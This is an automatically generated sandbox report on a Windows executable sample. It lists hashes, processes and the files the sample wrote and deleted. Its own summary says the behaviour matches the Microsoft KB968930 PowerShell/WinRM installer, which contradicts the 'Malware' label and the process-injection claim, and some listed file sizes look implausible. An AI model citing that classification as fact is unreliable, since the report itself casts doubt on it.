Sample_c10f9f83af

by malwarelabrobot on March 25th, 2016 in Malware Descriptions.

mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: c10f9f83af01bb34cebe94c30ce5049f
SHA1: 6390ea90ae3993901d24eacb3a2ec9eb92f6451b
SHA256: c817f212739603f131e152475cc6da97b5b4e16e8d8c7b05ce0114592acc6fa9
SSDeep: 6144:aZNutyPOSITHa4U6yUAu88SjTLU8DfsWRoerVbjn:AIb64UbPu8T0rU1jn
Size: 259127 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-12-19 17:29:09
Analyzed on: WindowsXP SP3 32-bit


Summary:

Classified as Malware by the automated system. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

The behaviour recorded below is that of a Windows update installer rather than of a dropper: the sample spawns WindowsXP-KB968930-x86-ENG.exe, which unpacks Windows PowerShell 2.0 and WinRM 2.0 components (powershell.exe, wsmsvc.dll, winrm.vbs, the update catalog update\kb968930xp.cat) into C:\ae90c0f98410dabe3b7635b5ceb43e, runs mofcomp.exe, ngen.exe and the PowerShell setup utilities (PSCustomSetupUtil.exe, PSSetupNativeUtils.exe), and then deletes the extraction directory. KB968930 is the Windows Management Framework Core update for Windows XP. The PEiD hit (UPolyXv05_v6) and the "Packed" entropy verdict indicate only a compressed self-extracting package; both also match legitimate installers. "Company: no certificate found" means the analysis system found no Authenticode signature on the submitted file, so whether this is an unmodified copy of the Microsoft package cannot be decided from this report alone. Compare the hashes above with those of the package obtained from Microsoft and check its Authenticode signature before treating the verdict as final.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

mofcomp.exe:2768
WindowsXP-KB968930-x86-ENG.exe:804
ngen.exe:4084
ngen.exe:3616
ngen.exe:3712
ngen.exe:3636
ngen.exe:3672
ngen.exe:252
ngen.exe:3652
ngen.exe:4092
ngen.exe:3576
ngen.exe:492
ngen.exe:364
ngen.exe:3628
ngen.exe:3600
ngen.exe:3660
ngen.exe:3608
ngen.exe:1796
ngen.exe:3524
ngen.exe:3644
ngen.exe:3720
ngen.exe:3704
ngen.exe:3560
ngen.exe:3680
ngen.exe:3548
%original file name%.exe:792
update.exe:304
mscorsvw.exe:3464
mscorsvw.exe:3456
mscorsvw.exe:3680
mscorsvw.exe:3532
mscorsvw.exe:2924
mscorsvw.exe:2700
mscorsvw.exe:2160
mscorsvw.exe:2756
mscorsvw.exe:3136
mscorsvw.exe:3336
mscorsvw.exe:3408
mscorsvw.exe:280
mscorsvw.exe:3816
mscorsvw.exe:1112
mscorsvw.exe:2940
PSCustomSetupUtil.exe:3868
PSCustomSetupUtil.exe:2844
PSCustomSetupUtil.exe:2924
PSCustomSetupUtil.exe:3140
PSCustomSetupUtil.exe:3004
PSCustomSetupUtil.exe:3060
PSCustomSetupUtil.exe:3308
PSCustomSetupUtil.exe:3736
PSCustomSetupUtil.exe:3164
PSCustomSetupUtil.exe:3232
PSCustomSetupUtil.exe:3028
PSCustomSetupUtil.exe:3104
PSCustomSetupUtil.exe:3256
PSCustomSetupUtil.exe:3892
PSCustomSetupUtil.exe:3844
PSCustomSetupUtil.exe:2872
PSCustomSetupUtil.exe:3768
PSCustomSetupUtil.exe:3936
PSCustomSetupUtil.exe:3984
PSCustomSetupUtil.exe:2972
PSCustomSetupUtil.exe:3284
PSCustomSetupUtil.exe:3788
PSCustomSetupUtil.exe:2896
PSCustomSetupUtil.exe:3192
PSCustomSetupUtil.exe:3960
PSCustomSetupUtil.exe:2792
PSSetupNativeUtils.exe:2068
regsvr32.exe:1976
regsvr32.exe:780
wsmanhttpconfig.exe:2740
wsmanhttpconfig.exe:2668

The Malware injects its code into the following process(es):

regsvr32.exe:436
regsvr32.exe:928

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mofcomp.exe:2768 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:804 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll (3118 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshmsg.dll (4 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update (4 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.runtime.dll (33 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_automatic_variables.help.txt (14 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmpty.xsl (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_ise.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\eula.txt (586 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.dll (591 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll (1145 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_jobs.help.txt (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spuninst.exe (3787 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_do.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_troubleshooting.help.txt (146 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_ref.help.txt (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\eventforwarding.adm (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_debuggers.help.txt (21 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\profile.ps1 (772 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_environment_variables.help.txt (417 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_operators.help.txt (770 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmanhttpconfig.exe (3009 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_profiles.help.txt (457 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmsvc.dll (15909 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_aliases.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_wmi_cmdlets.help.txt (8 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spupdsvc.exe (287 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\certificate.format.ps1xml (155 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssnapins.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_hash_tables.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_special_characters.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_faq.help.txt (775 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrs.exe (1154 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.exe (10748 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrshost.exe (22 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_switch.help.txt (489 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershellcore.format.ps1xml (1492 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmprovhost.exe (657 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.psd1 (950 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_continue.help.txt (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_parameters.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.inf (2457 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.mof (789 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\kb968930xp.cat (512 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_comment_based_help.help.txt (595 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_wildcards.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_signing.help.txt (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\updspapi.dll (5940 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssessions.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll-help.xml (16567 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_while.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_job_details.help.txt (824 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\dotnettypes.format.ps1xml (266 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmplpxy.dll (603 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_requires.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_objects.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_syntax.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.resources.dll (9 bytes)
C:\$Directory (800 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll (5010 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_arrays.help.txt (8 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_for.help.txt (146 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.dll (1842 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_properties.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_join.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrscmd.dll (2907 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.resources.dll (13 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_internationalization.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_requirements.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.format.ps1xml (16 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_scripts.help.txt (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_eventlogs.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_return.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_comparison_operators.help.txt (11 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_precedence.help.txt (8 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_locations.help.txt (794 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_modules.help.txt (13 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshplugin.dll (802 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pssetupnativeutils.exe (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_line_editing.help.txt (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_methods.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssession_details.help.txt (9 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_foreach.help.txt (10 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrssrv.dll (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremotemanagement.adm (574 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.ini (1956 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmtxt.xsl (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_parsing.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.exe (2526 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrsmgr.dll (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_try_catch_finally.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremoteshell.adm (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wtrinstaller.ico (4803 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_preference_variables.help.txt (37 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmwmipl.dll (2816 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_type_operators.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_format.ps1xml.help.txt (17 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_execution_policies.help.txt (13 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_trap.help.txt (10 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_break.help.txt (792 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_throw.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_providers.help.txt (59 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_prompts.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\getevent.types.ps1xml (15 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_assignment_operators.help.txt (379 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\importallmodules.psd1 (438 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_reserved_words.help.txt (1 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\help.format.ps1xml (3947 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\$shtdwn$.req (788 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_path_syntax.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_quoting_rules.help.txt (659 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_types.ps1xml.help.txt (481 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pscustomsetuputil.exe (316 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmres.dll (6164 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_bits_cmdlets.help.txt (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_if.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe.mui (10 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowspowershellhelp.chm (26041 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_logical_operators.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe (7339 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_regular_expressions.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_redirection.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_output.help.txt (887 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.resources.dll (4 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshsip.dll (24 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.dll (14450 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_arithmetic_operators.help.txt (168 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spmsg.dll (495 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wevtfwd.dll (3351 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\diagnostics.format.ps1xml (590 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.mof (4 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.cmd (35 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_language_keywords.help.txt (11 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_split.help.txt (10 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\types.ps1xml (2510 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_scopes.help.txt (76 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_variables.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.vbs (2727 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_escape_characters.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_methods.help.txt (6 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\registry.format.ps1xml (20 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions.help.txt (586 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.resources.dll (3153 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_commonparameters.help.txt (12 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershelltrace.format.ps1xml (344 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_blocks.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_transactions.help.txt (1011 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pipelines.help.txt (411 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\default.help.txt (2 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_history.help.txt (3 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.ver (14 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\spcustom.dll (23 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pspluginwkr.dll (1756 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_jobs.help.txt (13 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_data_sections.help.txt (5 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\filesystem.format.ps1xml (133 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_core_commands.help.txt (221 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_session_configurations.help.txt (276 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsman.format.ps1xml (837 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll (38414 bytes)

The Malware deletes the following file(s):

C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_debuggers.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_automatic_variables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmpty.xsl (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\eula.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshmsg.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrssrv.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spuninst.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_methods.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_troubleshooting.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_ref.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowspowershellhelp.chm (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.runtime.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.psd1 (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_environment_variables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremotemanagement.adm (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmanhttpconfig.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_profiles.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmsvc.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_aliases.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_wmi_cmdlets.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spupdsvc.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.ini (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_parameters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssnapins.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_hash_tables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_special_characters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_faq.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrs.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrshost.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershellcore.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmprovhost.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_continue.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_parameters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.inf (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.mof (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\kb968930xp.cat (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_comment_based_help.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_wildcards.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrsmgr.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_signing.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\updspapi.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_while.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_language_keywords.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmplpxy.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_requires.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_objects.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_syntax.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_do.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_arrays.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_for.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssessions.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_properties.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_join.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrscmd.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_internationalization.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_scripts.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_eventlogs.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_return.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_comparison_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_precedence.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_locations.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_output.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshplugin.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\eventforwarding.adm (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pssetupnativeutils.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_line_editing.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssession_details.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\help.format.ps1xml (0 bytes)
